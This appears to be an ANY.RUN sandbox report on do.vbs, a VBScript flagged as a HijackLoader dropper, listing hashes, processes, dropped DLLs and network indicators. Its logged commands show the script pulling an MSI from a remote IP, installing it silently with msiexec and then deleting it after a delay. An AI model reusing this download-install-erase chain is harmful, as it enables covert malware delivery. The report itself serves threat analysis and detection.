| Field | Value |
|---|---|
| File name: | do.vbs |
| Full analysis: | https://app.any.run/tasks/506b604c-535d-4a02-9acb-b5ced15954e3 |
| Verdict: | Malicious activity |
| Threats: | HijackLoader is a modular malware acting as a vehicle for distributing different types of malicious software on compromised systems. It gained prominence during the summer of 2023 and has since been used in multiple attacks against organizations from various sectors, including hospitality businesses. |
| Analysis date: | December 14, 2025, 06:08:06 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with CRLF line terminators |
| MD5: | EB32DA728F3CD7081F0CBCC8C52B202A |
| SHA1: | 524C315897F44F9009E801A98577C49530730E0E |
| SHA256: | A1432C163D00964E629CBF199B69634BF44FE9D36CAE4D14BFFF91326018043F |
| SSDEEP: | 12:9vWdgBK1HerhB08YakH4mgGFQfoZifaZCCcsBZgGS9HHCD:9AQhV7kpQGntcscGWHA |
| PID | CMD | Path | Indicators | Parent process | Details |
|---|---|---|---|---|---|
| 7220 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | | svchost.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Activation Client; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800) |
| 7412 | "C:\WINDOWS\System32\WScript.exe" C:\Users\admin\AppData\Local\Temp\do.vbs | C:\Windows\System32\wscript.exe | | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Exit code: 0; Version: 5.812.10240.16384 |
| 7480 | "C:\Windows\System32\msiexec.exe" /i "C:\Windows\Temp\upd1412_7054.msi" /quiet /qn /norestart | C:\Windows\System32\msiexec.exe | — | wscript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows® installer; Exit code: 0; Version: 5.0.19041.1 (WinBuild.160101.0800) |
| 7600 | "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 30 >nul && del /f /q "C:\Windows\Temp\upd1412_7054.msi" | C:\Windows\System32\cmd.exe | — | wscript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800) |
| 7608 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Console Window Host; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800) |
| 7688 | C:\WINDOWS\system32\msiexec.exe /V | C:\Windows\System32\msiexec.exe | | services.exe | User: SYSTEM; Company: Microsoft Corporation; Integrity Level: SYSTEM; Description: Windows® installer; Version: 5.0.19041.1 (WinBuild.160101.0800) |
| 7696 | ping 127.0.0.1 -n 30 | C:\Windows\System32\PING.EXE | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: TCP/IP Ping Command; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800) |
| 7772 | "C:\Users\admin\AppData\Local\Baffled\Blue-Port11.exe" | C:\Users\admin\AppData\Local\Baffled\Blue-Port11.exe | | msiexec.exe | User: admin; Company: Smart Game Booster; Integrity Level: MEDIUM; Description: Smart Game Booster; Exit code: 0; Version: 5.3.0.670 |
| 7832 | C:\ProgramData\com_web_gateway_v4_0\Blue-Port11.exe | C:\ProgramData\com_web_gateway_v4_0\Blue-Port11.exe | | Blue-Port11.exe | User: admin; Company: Smart Game Booster; Integrity Level: MEDIUM; Description: Smart Game Booster; Version: 5.3.0.670 |
| 7952 | "C:\Users\admin\AppData\Roaming\com_web_gateway_v4_0\XPFix.exe" "C:\Users\admin\AppData\Roaming\com_web_gateway_v4_0\XPFix.exe" /u | C:\Users\admin\AppData\Roaming\com_web_gateway_v4_0\XPFix.exe | — | Blue-Port11.exe | User: admin; Company: 360.cn; Integrity Level: MEDIUM; Description: 360安全卫士 安全防护中心模块; Version: 1, 0, 0, 1013 |
| PID | Process | Operation | Key | Name | Value |
|---|---|---|---|---|---|
| 7688 | msiexec.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\FB3C7F527D40E02509C4F9F82E80101E | 7CCBF1EF4ECAB234CBFEE55EC7A4BA90 | C:\Users\admin\AppData\Local\Baffled\PluginHelper.dll |
| 7688 | msiexec.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\A0713645E276EFB5399AE76A75989D2F | 7CCBF1EF4ECAB234CBFEE55EC7A4BA90 | C:\Users\admin\AppData\Local\Baffled\PowerMgr.dll |
| 7688 | msiexec.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\C0515B39BAA056F59881DBE6CDA5BFF4 | 7CCBF1EF4ECAB234CBFEE55EC7A4BA90 | C:\Users\admin\AppData\Local\Baffled\Register.dll |
| 7688 | msiexec.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\340A7C8F396E3C251BF0F5927DC4488C | 7CCBF1EF4ECAB234CBFEE55EC7A4BA90 | C:\Users\admin\AppData\Local\Baffled\rtl120.bpl |
| 7688 | msiexec.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\F003FA7A663EF1A5DBB07E72BEBEC2CC | 7CCBF1EF4ECAB234CBFEE55EC7A4BA90 | C:\Users\admin\AppData\Local\Baffled\Scan.dll |
| 7688 | msiexec.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\01F19E88083A7B352B0738BD581E52F1 | 7CCBF1EF4ECAB234CBFEE55EC7A4BA90 | C:\Users\admin\AppData\Local\Baffled\sdassist.dll |
| 7688 | msiexec.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\2DB7F9E6CE065A656B1B1AC1B1CDA742 | 7CCBF1EF4ECAB234CBFEE55EC7A4BA90 | C:\Users\admin\AppData\Local\Baffled\sqlite3.dll |
| 7688 | msiexec.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\7F3484679A0A725549307C5F2E09144D | 7CCBF1EF4ECAB234CBFEE55EC7A4BA90 | C:\Users\admin\AppData\Local\Baffled\Temperature.dll |
| 7688 | msiexec.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\EF404C1C7EC27935AB2E2C864D720A7C | 7CCBF1EF4ECAB234CBFEE55EC7A4BA90 | C:\Users\admin\AppData\Local\Baffled\vcl120.bpl |
| 7688 | msiexec.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\A41242D72F1806855A78B58B2C265F46 | 7CCBF1EF4ECAB234CBFEE55EC7A4BA90 | C:\Users\admin\AppData\Local\Baffled\vclx120.bpl |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 7412 | wscript.exe | C:\Windows\Temp\upd1412_7054.msi | — | — | — |
| 7688 | msiexec.exe | C:\Windows\Installer\f7006.msi | — | — | — |
| 7688 | msiexec.exe | C:\Windows\Temp\~DFF9EF61ACB5355633.TMP | binary | 311766E458C977DCD588768B0643BC2B | 5F72186C52E0A088786AC76696AF2405AE142E9077B0B64E79C820A1A748ED36 |
| 7688 | msiexec.exe | C:\Windows\Temp\~DF3034946D363B4F51.TMP | binary | BF619EAC0CDF3F68D496EA9344137E8B | 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560 |
| 7688 | msiexec.exe | C:\Users\admin\AppData\Local\Baffled\PowerMgr.dll | executable | D0D3E744178EEA35DDB3E55568EEEDCA | 461A9122A5C3A63644D005CAA601CF9E4B7E5EF6F852E8767E398F39486E4E34 |
| 7688 | msiexec.exe | C:\Users\admin\AppData\Local\Baffled\HardwareLib.dll | executable | 022568111D51B5DBB92C0AB0872B380C | 4E5F1F42F90316819B9FE431722C5CC8C0A91D90E0FEA87E580F17629E088A9A |
| 7688 | msiexec.exe | C:\Users\admin\AppData\Local\Baffled\PluginHelper.dll | executable | DDC1CC25830C2AFAAA64D6BD784FB26D | 3B123F1FEA7F38DE527BCA6DC51B9A922A7189A72441B48A39743063FB131148 |
| 7688 | msiexec.exe | C:\Users\admin\AppData\Local\Baffled\Cro.mfv | binary | 6FAA31F811D8CCBC1FE2FDB442873DBF | 08131E9B6E0C7097F909DB372C44941E975DD6E0AEA237BE47A187AEEA8C8693 |
| 7688 | msiexec.exe | C:\Windows\Installer\f7009.msi | — | — | — |
| 7688 | msiexec.exe | C:\Windows\Installer\MSI7100.tmp | binary | F21FC4F2AB3F306345C82A03640C2509 | 3B87F5A66C973B633D4B10F8D4E9D4BA037A970743F585B3FEEFE099D2D084A7 |
| PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| 6768 | MoUsoCoreWorker.exe | GET | 304 | 51.104.136.2:443 | https://settings-win.data.microsoft.com/settings/v3.0/OneSettings/Client?OSVersionFull=10.0.19045.4046.amd64fre.vb_release.191206-1406&LocalDeviceID=s%3ABAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&FlightRing=Retail&AttrDataVer=186&OSUILocale=en-US&OSSkuId=48&App=WOSC&AppVer=&IsFlightingEnabled=0&TelemetryLevel=1&DeviceFamily=Windows.Desktop | unknown | — | — | whitelisted |
| 6768 | MoUsoCoreWorker.exe | GET | 304 | 51.104.136.2:443 | https://settings-win.data.microsoft.com/settings/v3.0/wsd/muse?ProcessorClockSpeed=3094&FlightIds=&UpdateOfferedDays=4294967295&BranchReadinessLevel=CB&OEMManufacturerName=DELL&IsCloudDomainJoined=0&ProcessorIdentifier=AMD64%20Family%2023%20Model%201%20Stepping%202&sku=48&ActivationChannel=Retail&AttrDataVer=186&IsMDMEnrolled=0&ProcessorCores=6&ProcessorModel=AMD%20Ryzen%205%203500%206-Core%20Processor&TotalPhysicalRAM=6144&PrimaryDiskType=4294967295&FlightingBranchName=&ChassisTypeId=1&OEMModelNumber=DELL&SystemVolumeTotalCapacity=260281&sampleId=95271487&deviceClass=Windows.Desktop&App=muse&DisableDualScan=0&AppVer=10.0&OEMSubModel=J5CR&locale=en-US&IsAlwaysOnAlwaysConnectedCapable=0&ms=0&DefaultUserRegion=244&UpdateServiceUrl=http%3A%2F%2Fneverupdatewindows10.com&osVer=10.0.19045.4046.amd64fre.vb_release.191206-1406&os=windows&deviceId=s%3ABAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&DeferQualityUpdatePeriodInDays=0&ring=Retail&DeferFeatureUpdatePeriodInDays=30 | unknown | — | — | whitelisted |
| 7412 | wscript.exe | GET | — | 95.164.53.115:5506 | http://95.164.53.115:5506/DVQQXUHT.msi | unknown | — | — | unknown |
| 1112 | svchost.exe | GET | 200 | 184.30.131.245:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
| 6296 | SIHClient.exe | GET | 200 | 23.59.18.102:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
| 6296 | SIHClient.exe | GET | 200 | 52.165.164.15:443 | https://fe3cr.delivery.mp.microsoft.com/clientwebservice/ping | unknown | — | — | whitelisted |
| 6296 | SIHClient.exe | GET | 200 | 20.165.94.63:443 | https://slscr.update.microsoft.com/sls/ping | unknown | — | — | whitelisted |
| 6296 | SIHClient.exe | GET | 304 | 20.165.94.63:443 | https://slscr.update.microsoft.com/SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | unknown | — | — | whitelisted |
| 6296 | SIHClient.exe | GET | 200 | 23.59.18.102:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
| 6296 | SIHClient.exe | GET | 200 | 20.165.94.63:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | unknown | — | 29.1 Kb | whitelisted |
| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 4 | System | 192.168.100.255:137 | — | Not routed | — | whitelisted |
| 4624 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
| 6768 | MoUsoCoreWorker.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
| 3088 | RUXIMICS.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
| 4 | System | 192.168.100.255:138 | — | Not routed | — | whitelisted |
| 7412 | wscript.exe | 95.164.53.115:5506 | — | QWINS-LTD QWINS AS-SET: ~ # AS213702:AS-CUSTOMERS | GB | unknown |
| 1112 | svchost.exe | 40.126.31.0:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
| 1112 | svchost.exe | 184.30.131.245:80 | ocsp.digicert.com | AKAMAI-AS | US | whitelisted |
| 4624 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
| 4624 | svchost.exe | 2.16.164.72:80 | crl.microsoft.com | AKAMAI-ASN1 | NL | whitelisted |
| Domain | IP | Reputation |
|---|---|---|
| settings-win.data.microsoft.com | | whitelisted |
| google.com | | whitelisted |
| login.live.com | | whitelisted |
| ocsp.digicert.com | | whitelisted |
| crl.microsoft.com | | whitelisted |
| www.microsoft.com | | whitelisted |
| client.wns.windows.com | | whitelisted |
| slscr.update.microsoft.com | | whitelisted |
| fe3cr.delivery.mp.microsoft.com | | whitelisted |
| activation-v2.sls.microsoft.com | | whitelisted |
| PID | Process | Class | Message |
|---|---|---|---|
| — | — | Unknown Traffic | ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW) |